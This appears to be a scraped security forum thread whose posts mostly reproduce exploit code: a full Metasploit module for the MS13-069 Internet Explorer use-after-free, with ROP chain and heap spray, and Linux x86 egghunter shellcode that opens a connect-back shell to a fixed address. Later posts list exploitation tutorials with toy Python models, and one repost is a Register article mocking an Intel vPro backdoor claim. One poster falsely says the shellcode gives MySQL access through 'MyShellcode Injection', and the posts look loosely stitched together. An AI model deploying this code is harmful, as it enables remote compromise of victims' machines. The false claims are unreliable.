# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'        => "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free",
      'Description' => %q{
        This module exploits a use-after-free vulnerability found in Internet
        Explorer, specifically in how the browser handles the caret (text
        cursor) object. In IE's standards mode, the caret handling's vulnerable
        state can be triggered by first setting up an editable page with an
        input field, and then we can force the caret to update in an
        onbeforeeditfocus event by setting the body's innerHTML property. In
        this event handler, mshtml!CCaret::`vftable' can be freed using a
        document.write() function, however, mshtml!CCaret::UpdateScreenCaret
        remains unaware of this change, and still uses the same reference to
        the CCaret object. When the function tries to use this invalid
        reference to call a virtual function at offset 0x2c, it finally
        results in a crash. Precise control of the freed object allows
        arbitrary code execution under the context of the user.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'corelanc0d3r', # Vuln discovery & PoC (@corelanc0d3r)
          'sinn3r'        # Metasploit (@_sinn3r)
        ],
      'References'  =>
        [
          [ 'CVE', '2013-3205' ],
          [ 'OSVDB', '97094' ],
          [ 'MSB', 'MS13-069' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-217/' ]
        ],
      'Platform'    => 'win',
      'Targets'     =>
        [
          [ 'Automatic', {} ],
          [
            # Win 7 target on hold until we have a stable custom spray for it
            'IE 8 on Windows XP SP3',
            {
              'Rop'         => :msvcrt,
              'TargetAddr'  => 0x1ec20101, # Allocs @ 1ec20020 (+0xe1 bytes to be null-byte free) - in ecx
              'PayloadAddr' => 0x1ec20105, # where the ROP payload begins
              'Pivot'       => 0x77C4FA1A, # mov esp,ebx; pop ebx; ret
              'PopESP'      => 0x77C37422, # pop esp; ret (pivot to a bigger space)
              'Align'       => 0x77c4d801  # add esp, 0x2c; ret (ROP gadget to jmp over pivot gadget)
            }
          ]
        ],
      'Payload'     =>
        {
          # Our property sprays dislike null bytes
          'BadChars' => "\x00",
          # Fix the stack again before the payload is executed.
          # If we don't do this, meterpreter fails due to a bad socket.
          'Prepend'  =>
            "\x64\xa1\x18\x00\x00\x00" +  # mov eax, fs:[0x18]
            "\x83\xC0\x08" +              # add eax, byte 8
            "\x8b\x20" +                  # mov esp, [eax]
            "\x81\xC4\x30\xF8\xFF\xFF",   # add esp, -2000
          # Fall back to the previous allocation so we have plenty of space
          # for the decoder to use
          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff" # add esp, -80000
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "Sep 10 2013",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        return t
      end
    end

    nil
  end

  def get_payload(t)
    rop = [
      0x77c1e844, # POP EBP # RETN [msvcrt.dll]
      0x77c1e844, # skip 4 bytes [msvcrt.dll]
      0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
      0xffffffff,
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c127e5, # INC EBX # RETN [msvcrt.dll]
      0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
      0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
      0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
      0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
      0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
      0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
      0x77c3048a, # POP EDI # RETN [msvcrt.dll]
      0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
      0x77c46efb, # POP ESI # RETN [msvcrt.dll]
      0x77c2aacc, # JMP [EAX] [msvcrt.dll]
      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
      0x77c35459  # ptr to 'push esp # ret ' [msvcrt.dll]
    ].pack("V*")

    # This data should appear at the beginning of the target address
    # (see TargetAddr in metadata)
    p = ''
    p << rand_text_alpha(225)                     # Padding to avoid null byte addr
    p << [t['TargetAddr']].pack("V*")             # For mov ecx,dword ptr [eax]
    p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
    p << [t['Pivot']].pack("V*")                  # Stack pivot
    p << rand_text_alpha(4)                       # Padding for the add esp,0x2c alignment
    p << rop                                      # ROP chain
    p << payload.encoded                          # Actual payload

    return p
  end

  #
  # Notes:
  # * A custom spray is used (see function putPayload), because document.write() keeps freeing
  #   our other sprays like js_property_spray or the heaplib + substring approach. This spray
  #   seems unstable for Win 7, we'll have to invest more time on that.
  # * Object size = 0x30
  #
  def get_html(t)
    js_payload_addr = ::Rex::Text.to_unescape([t['PayloadAddr']].pack("V*"))
    js_target_addr  = ::Rex::Text.to_unescape([t['TargetAddr']].pack("V*"))
    js_pop_esp      = ::Rex::Text.to_unescape([t['PopESP']].pack("V*"))
    js_payload      = ::Rex::Text.to_unescape(get_payload(t))
    js_rand_dword   = ::Rex::Text.to_unescape(rand_text_alpha(4))

    html = %Q|<!DOCTYPE html>
    <html>
    <head>
    <script>
    var freeReady = false;

    function getObject() {
      var obj = '';
      for (i=0; i < 11; i++) {
        if (i==1)      { obj += unescape("#{js_pop_esp}"); }
        else if (i==2) { obj += unescape("#{js_payload_addr}"); }
        else if (i==3) { obj += unescape("#{js_target_addr}"); }
        else           { obj += unescape("#{js_rand_dword}"); }
      }
      obj += "\\u4545";
      return obj;
    }

    function emptyAllocator(obj) {
      for (var i = 0; i < 40; i++) {
        var e = document.createElement('div');
        e.className = obj;
      }
    }

    function spray(obj) {
      for (var i = 0; i < 50; i++) {
        var e = document.createElement('div');
        e.className = obj;
        document.appendChild(e);
      }
    }

    function putPayload() {
      var p = unescape("#{js_payload}");
      var block = unescape("#{js_rand_dword}");
      while (block.length < 0x80000) block += block;
      block = p + block.substring(0, (0x80000-p.length-6)/2);
      for (var i = 0; i < 0x300; i++) {
        var e = document.createElement('div');
        e.className = block;
        document.appendChild(e);
      }
    }

    function trigger() {
      if (freeReady) {
        var obj = getObject();
        emptyAllocator(obj);
        document.write("#{rand_text_alpha(1)}");
        spray(obj);
        putPayload();
      }
    }

    window.onload = function() {
      document.body.contentEditable = 'true';
      document.execCommand('InsertInputPassword');
      document.body.innerHTML = '#{rand_text_alpha(1)}';
      freeReady = true;
    }
    </script>
    </head>
    <body onbeforeeditfocus="trigger()">
    </body>
    </html>
    |

    html.gsub(/^\x20\x20\x20\x20/, '')
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    t = get_target(agent)

    unless t
      print_error("Not a suitable target: #{agent}")
      send_not_found(cli)
      return
    end

    html = get_html(t)
    print_status("Sending exploit...")
    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
  end
end

=begin
In mshtml!CCaret::UpdateScreenCaret function:
.text:63620F82                 mov     ecx, [eax]      ; crash
.text:63620F84                 lea     edx, [esp+110h+var_A4]
.text:63620F88                 push    edx
.text:63620F89                 push    eax
.text:63620F8A                 call    dword ptr [ecx+2Ch]
=end

Sursa: MS13-069 Microsoft Internet Explorer CCaret Use-After-Free ? Packet Storm
  17. Linux / x86 Multi-Egghunter Shellcode

Authored by Ryan Fenno

This is multi-egghunter Linux/x86 shellcode.

/*
Title:       Multi-Egghunter
Author:      Ryan Fenno (@ryanfenno)
Date:        20 September 2013
Tested on:   Linux/x86 (Ubuntu 12.0.3)

Description: This entry represents an extension of skape's sigaction(2)
             egghunting method [1] to multiple eggs. It is similar in spirit
             to BJ 'SkyLined' Wever's omelet shellcode for Win32 [2]. The
             proof-of-concept presented here splits a reverse TCP bind
             shell [3] into two parts. The egghunter is not only responsible
             for finding the two eggs, but also for executing them in the
             correct order. It is readily extendable to any (reasonable)
             number of eggs.

References:
[1] skape, "Safely Searching Process Virtual Address Space",
    www.hick.org/code/skape/papers/egghunt-shellcode.pdf
[2] Wever, Berend-Jan, "w32-SEH-omelet-shellcode",
    http://code.google.com/p/w32-seh-omelet-shellcode/
[3] Willis, R. "reversetcpbindshell",
    http://shell-storm.org/shellcode/files/shellcode-849.php
*/

#include <stdio.h>

#define MARKER "\x93\x51\x93\x59"
#define TAG1 "\x01\x51\x93\x59" // easiest to use latter three bytes
#define TAG2 "\x02\x51\x93\x59" // of MARKER for latter three of TAGs

// first egg/tag/shellcode
#define IPADDR "\xc0\xa8\x7a\x01" // 192.168.122.1
#define PORT "\xab\xcd"           // 43981

unsigned char shellcode1[] =
  MARKER
  TAG1
  // SHELLCODE1
  "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a\x02\x89\xe1\xcd\x80"
  "\x96\xb0\x66\xb3\x03\x68" IPADDR "\x66\x68" PORT "\x66"
  "\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80"
  // perform the jump
  "\x83\xc4\x20\x5f\x83\xec\x24\xff\xe7"
  ;

/*
global _start
section .text
_start:
    xor ebx, ebx
    mul ebx
    mov al, 0x66          ; socketcall() <linux/net.h>
    inc ebx               ; socket()
    push edx              ; arg3 :: protocol = 0
    push ebx              ; arg2 :: SOCK_STREAM = 1
    push byte 0x2         ; arg1 :: AF_INET = 2
    mov ecx, esp
    int 0x80

    xchg eax, esi         ; save clnt_sockfd in esi

    mov al, 0x66          ; socketcall()
    mov bl, 0x3           ; connect()
    ; build sockaddr_in struct (srv_addr)
    push dword 0x017AA8C0 ; IPv4 address 192.168.122.1 in hex (little endian)
    push word 0x697a      ; TCP port 0x7a69 = 31337
    push word 0x2         ; AF_INET = 2
    mov ecx, esp          ; pointer to sockaddr_in struct
    push dword 0x10       ; arg3 :: sizeof(struct sockaddr) = 16 [32-bits]
    push ecx              ; arg2 :: pointer to sockaddr_in struct
    push esi              ; arg1 :: clnt_sockfd
    mov ecx, esp
    int 0x80

;---- perform the jump
; looking at the stack at this point, the target for the jump
; is at $esp+0x20, so...
    add esp, 0x20
    pop edi
    sub esp, 0x24
    jmp edi
*/

// second egg/tag/shellcode
unsigned char shellcode2[] =
  MARKER
  TAG2
  // SHELLCODE2
  "\x5b\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\xb0\x0b"
  "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89"
  "\xe2\x53\x89\xe1\xcd\x80"
  ;

/*
global _start
section .text
_start:
    pop ebx               ; arg1 :: clnt_sockfd
    push 0x2
    pop ecx               ; loop from 2 to 0

dup2loop:
    mov byte al, 0x3F     ; dup2(2)
    int 0x80
    dec ecx
    jns dup2loop          ; loop ends when ecx == -1

    xor eax, eax
    mov byte al, 0x0B     ; execve(2)
    push edx              ; null terminator
    push 0x68732f2f       ; "hs//"
    push 0x6e69622f       ; "nib/"
    mov ebx, esp          ; arg1 :: "/bin/sh\0"
    push edx              ; null terminator
    mov edx, esp          ; arg3 :: envp = NULL array
    push ebx
    mov ecx, esp          ; arg2 :: argv array (ptr to string)
    int 0x80
*/

unsigned char egghunter[] =
  "\x6a\x02\x59\x57\x51\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43"
  "\x58\xcd\x80\x3c\xf2\x74\xf1\xb8" MARKER "\x89\xcf\xaf"
  "\x75\xec\x89\xcb\x59\x20\xc8\xaf\x51\x89\xd9\x75\xe1\x59\xe2"
  "\xd5\xff\xe7";

/*
global _start
section .text
_start:
    push byte 0x2
    pop ecx               ; number of eggs

eggLoop:
    push edi              ; memory location of ecx-th piece; first of
                          ; these is meaningless
    push ecx              ; save counter
    xor ecx, ecx          ; initialize ecx for memory search

fillOnes:
    or cx, 0xfff

shiftUp:
    inc ecx
    push byte 0x43        ; sigaction(2)
    pop eax
    int 0x80
    cmp al, 0xf2
    jz fillOnes
    mov eax, 0x59935193   ; marker
    mov edi, ecx
    scasd                 ; advances edi by 0x4 if there is a match;
                          ; assumes direction flag (DF) is not set
    jnz shiftUp
    mov ebx, ecx          ; save off ecx in case we need to keep looking
    pop ecx               ; restore counter
    and al, cl            ; tag in eax
    scasd
    push ecx
    mov ecx, ebx
    jnz shiftUp
    pop ecx
    loop eggLoop
    jmp edi
*/

void main()
{
    printf("egghunter length:  %d\n", sizeof(egghunter)-1);
    printf("shellcode1 length: %d\n", sizeof(shellcode1)-1);
    printf("shellcode2 length: %d\n", sizeof(shellcode2)-1);

    ((int(*)())egghunter)();
}

Sursa: Linux / x86 Multi-Egghunter Shellcode ? Packet Storm

I posted it because it is well documented. For those who don't know what a shellcode is: you can use the code above to gain access to the MySQL databases of sites vulnerable to MyShellcode Injection. ( )
  18. PC disable can be triggered locally or remotely (an Internet or LAN connection is not necessary) under the following circumstances:

- Excessive end-user attempts to log into the system.
- The laptop misses its rendezvous time with the server (electronic check-in over the Internet), thereby issuing a local poison pill.
- The IT administrator sends a poison pill remotely to the stolen laptop across the Internet, intranet, or Short Messaging Service (SMS).
  19. Return-Oriented-Programming Authored by Saif El-Sherei Whitepaper called Return-Oriented-Programming (ROP FTW). Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/return-oriented-programming.pdf
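A ROP chain, like the msvcrt.dll chain in the MS13-069 module earlier, is just a list of gadget addresses that successive `ret` instructions walk through, with immediate values interleaved for `pop` gadgets to consume. A toy Python interpreter of that idea (the gadget addresses and semantics are invented for illustration):

```python
def run_chain(gadgets, stack, regs):
    """Walk a fake stack of gadget addresses; each gadget mutates the
    registers and returns the new stack pointer (its own 'ret')."""
    sp = 0
    while sp < len(stack):
        entry = stack[sp]
        sp += 1
        sp = gadgets[entry](regs, stack, sp)
    return regs

def pop_eax(regs, stack, sp):
    # pop eax ; ret  -> consumes the next stack slot into eax
    regs["eax"] = stack[sp]
    return sp + 1

def add_eax_ebx(regs, stack, sp):
    # add eax, ebx ; ret  (32-bit wraparound)
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF
    return sp + 1

gadgets = {0x77C0AAAA: pop_eax, 0x77C0BBBB: add_eax_ebx}
# Chain: pop 0x1000 into eax, then add ebx -- the same "load a
# constant, combine registers" pattern real chains use
chain = [0x77C0AAAA, 0x1000, 0x77C0BBBB]
regs = run_chain(gadgets, chain, {"eax": 0, "ebx": 0x40})
```

Note how `0x1000` never gets executed as a gadget: `pop_eax` advances the stack pointer past it, exactly as a real `pop eax ; ret` skips the immediate on the stack.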
  20. You're right, but then how does the anti-theft feature on Intel chips work? It's an idea that is hard to prove; we don't have to believe it, but we should take it into consideration and keep in mind that something like this is certainly possible.
  21. Format String Exploitation Tutorial Authored by Saif El-Sherei This is a brief whitepaper tutorial that discusses format string exploitation. Download: http://packetstormsecurity.com/files/download/123363/formatstring-tutorial.pdf
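The core of format-string exploitation is that printf-style functions fetch one argument from the stack for every conversion specifier, whether or not the caller actually supplied it. A toy Python model of the resulting information leak (the function and the "stack" list are purely illustrative):

```python
def vuln_printf(fmt: str, stack: list) -> str:
    """Toy printf: every %x pops the next value from the caller's
    stack -- exactly what a format-string bug lets an attacker do."""
    out, values = [], iter(stack)
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt) and fmt[i + 1] == "x":
            out.append(f"{next(values):x}")  # leak one stack word
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)

# Bug: the program calls vuln_printf(user_input, stack) instead of
# vuln_printf("%s", [user_input]) -- attacker input becomes the format
stack = [0xDEADBEEF, 0x41414141, 0x0BADF00D]  # pretend saved stack values
leak = vuln_printf("%x.%x.%x", stack)
```

Feeding `"%x.%x.%x"` dumps three stack words the programmer never meant to print; in real exploitation the same mechanism (plus `%n`) is pushed further into arbitrary reads and writes.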
  22. Off-By-One Exploitation Tutorial Authored by Saif El-Sherei This whitepaper is called Off-By-One Exploitation Tutorial. The off-by-one vulnerability in general means that if an attacker supplies input of a certain length and the program has an incorrect length condition, the program will write one byte outside the bounds of the space allocated to hold this input, causing one of two scenarios depending on the input. Download: http://packetstormsecurity.com/files/download/123361/offbyone-tutorial.pdf
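The incorrect length condition described above is typically an `i <= size` loop bound where `i < size` was intended. A small Python simulation of the resulting one-byte overwrite into an adjacent field (the flat memory model and names are mine):

```python
def bounded_copy(dst: bytearray, src: bytes, size: int, buggy: bool) -> None:
    """Copy src into a size-byte buffer. The buggy variant models the
    'i <= size' bound and writes one byte past the buffer."""
    limit = size + 1 if buggy else size
    for i in range(min(len(src), limit)):
        dst[i] = src[i]

# Memory model: an 8-byte buffer immediately followed by a 1-byte flag
memory = bytearray(b"\x00" * 8 + b"\x01")
bounded_copy(memory, b"A" * 16, 8, buggy=True)   # clobbers the flag byte

safe = bytearray(b"\x00" * 8 + b"\x01")
bounded_copy(safe, b"A" * 16, 8, buggy=False)    # flag byte survives
```

On a real stack that adjacent byte is often the least significant byte of the saved frame pointer, which is how a single-byte overwrite grows into full control of the frame.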
  23. Stack Based Buffer Overflow Exploitation Tutorial Authored by Saif El-Sherei This is a brief whitepaper tutorial discussing stack-based buffer overflow exploitation. Download: http://packetstorm.igor.onlinedirect.bg/papers/general/stackbo-tutorial.pdf
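A stack-based overflow boils down to an unbounded copy running past a fixed-size local buffer and into the saved frame pointer and return address. A flat-memory Python sketch of that layout (the addresses, sizes, and helper names are illustrative):

```python
import struct

def build_frame(buf_size: int) -> bytearray:
    """Flat model of a stack frame: local buffer, saved EBP, return address."""
    frame = bytearray(buf_size)             # char buf[buf_size]
    frame += struct.pack("<I", 0xBFFF0000)  # saved EBP (made up)
    frame += struct.pack("<I", 0x08048500)  # saved return address (made up)
    return frame

def unsafe_strcpy(frame: bytearray, data: bytes) -> None:
    frame[0:len(data)] = data               # no bounds check, like strcpy()

frame = build_frame(64)
# 64 bytes fill the buffer, 4 overwrite saved EBP, 4 overwrite the return address
payload = b"\x90" * 68 + struct.pack("<I", 0x41414141)
unsafe_strcpy(frame, payload)
ret = struct.unpack("<I", frame[68:72])[0]  # what "ret" would jump to
```

After the copy, the saved return address reads 0x41414141: when the function returns, execution is redirected to an attacker-chosen address, which is the whole point of the technique the tutorial walks through.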
  24. Integer overflow/underflow exploitation tutorial

By Saif El Sherei

www.elsherei.com

Introduction:

I decided to get a bit more into Linux exploitation, so I thought it would be nice to document this, as a good friend once said: "you think you understand something until you try to teach it". This is my first try at writing papers. This paper is my understanding of the subject. I understand it might not be complete; I am open to suggestions and modifications. I hope this project helps others as it helped me. This paper is purely for education purposes.

Note: the exploitation methods explained in the tutorial below will not work on modern systems due to NX, ASLR, and modern kernel security mechanisms. If we continue this series, we will have a tutorial on bypassing some of these controls.

What is an integer?

An integer in computing is a variable holding a whole number, with no fractional part. The size of an int depends on the architecture, so on the i386 (32-bit) arch an int is 32 bits. An integer is represented in memory in binary.

Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
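The wraparound behavior the paper describes can be reproduced exactly in Python by masking to 32 bits. A small sketch (helper name is mine):

```python
def to_i32(x: int) -> int:
    """Wrap a Python int the way a signed 32-bit C 'int' does on i386."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

# Overflow: INT_MAX + 1 wraps around to INT_MIN
wrapped = to_i32(2147483647 + 1)

# Classic allocation bug: the 32-bit size computation wraps, so the
# program allocates only 4 bytes yet later copies 0x40000001 items
n_items = 0x40000001
alloc_size = (n_items * 4) & 0xFFFFFFFF
```

The second snippet is the canonical exploitable pattern: `malloc(n * sizeof(int))` with attacker-controlled `n` wraps to a tiny allocation, and the subsequent copy loop becomes a heap overflow.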
  25. 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs

Tinfoil hat brigade say every PC is on mobile networks, even when powered down

By Richard Chirgwin, 23rd September 2013

Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating a zero-power-consumption on-chip 3G communications platform as an NSA backdoor.

The scoop comes courtesy of tinfoil socialist site Popular Resistance, in this piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes:

“The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has it’s own operating system embedded on the chip itself. As long as the power supply is available and and in working condition, it can be woken up by the Core vPro processor, which runs on the system’s phantom power and is able to quietly turn individual hardware components on and access anything on them.”

A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda.

Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried on its chips, one that apparently extends wake-on-LAN to wake-on-mobile:

“Core vPro processors work in conjunction with Intel’s new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there,” he writes, “anti theft 3.0 always has that 3G connection on also, even if the computer is turned off” (emphasis added).

No evidence is offered for the assertions detailed above.

And with that, El Reg will now happily open the floor to the commentards … ®

Sursa: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register